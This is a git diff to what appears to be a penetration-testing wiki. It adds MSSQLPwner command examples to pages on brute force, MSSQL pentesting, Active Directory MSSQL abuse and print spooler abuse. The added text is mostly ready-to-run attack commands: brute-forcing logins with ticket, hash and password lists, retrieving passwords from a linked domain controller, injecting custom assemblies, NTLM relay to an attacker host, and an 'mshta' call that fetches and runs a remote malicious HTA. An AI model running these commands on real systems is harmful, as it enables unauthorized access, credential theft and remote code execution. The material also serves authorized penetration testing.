diff --git a/generic-methodologies-and-resources/brute-force.md b/generic-methodologies-and-resources/brute-force.md index fc50a9f8bd2..19cf08ae9dc 100644 --- a/generic-methodologies-and-resources/brute-force.md +++ b/generic-methodologies-and-resources/brute-force.md @@ -287,10 +287,30 @@ legba mongodb --target localhost:27017 --username root --password data/passwords ### MSSQL +[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) +```shell +# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using tickets against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt + +# Bruteforce using passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt + +# Bruteforce using hashes against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt +``` + + ```bash legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433 ``` + ### MySQL ```bash diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index 8c3ea5cb77e..01e30101606 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -90,6 +90,25 @@ msf> use windows/manage/mssql_local_auth_bypass #### Login + +[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) +```shell +# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using tickets against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt + +# Bruteforce using passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt + +# Bruteforce using hashes against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt +``` + ```bash # Using Impacket mssqlclient.py mssqlclient.py [-db volume] /:@ @@ -232,6 +251,21 @@ EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.1 '; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' — ``` +[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) +```shell +# Executing custom assembly on the current server with windows authentication and executing hostname command +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname + +# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname + +# Executing the hostname command using stored procedures on the linked SRV01 server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname + +# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate +``` + ### Steal NetNTLM hash / Relay attack You should start a **SMB server** to capture the hash used in the authentication (`impacket-smbserver` or `responder` for example). @@ -248,6 +282,19 @@ sudo impacket-smbserver share ./ -smb2support msf> use auxiliary/admin/mssql/mssql_ntlm_stealer ``` +[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) + +```shell +# Issuing NTLM relay attack on the SRV01 server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on the local server with custom command +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250 +``` + {% hint style="warning" %} You can check if who (apart sysadmins) has permissions to run those MSSQL functions with: diff --git a/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md index 9771ba041a1..623c1a5eb4f 100644 --- a/windows-hardening/active-directory-methodology/abusing-ad-mssql.md +++ b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md @@ -21,6 +21,76 @@ Learn & practice GCP Hacking: + +```shell +# Interactive mode +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive + +# Interactive mode with 2 depth level of impersonations +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -max-impersonation-depth 2 interactive + + +# Executing custom assembly on the current server with windows authentication and executing hostname command +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname + +# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname + +# Executing the hostname command using stored procedures on the linked SRV01 server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname + +# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate + +# Issuing NTLM relay attack on the SRV01 server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on the local server with custom command +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250 + +# Executing direct query +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query "SELECT CURRENT_USER" + +# Retrieving password from the linked server DC01 +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrive-password + +# Execute code using custom assembly on the linked server DC01 +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 inject-custom-asm SqlInject.dll + +# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using tickets against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt + +# Bruteforce using passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt + +# Bruteforce using hashes against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt + +``` + +### Enumerating from the network without domain session + +``` +# Interactive mode +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive +``` + +--- +### Powershell + The powershell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case. ```powershell diff --git a/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md index 278da903023..35458752c8f 100644 --- a/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md +++ b/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md @@ -92,6 +92,20 @@ C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -S EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1 ``` +[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) + +```shell +# Issuing NTLM relay attack on the SRV01 server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on the local server with custom command +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250 +``` + + Or use this other technique: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce) ### Certutil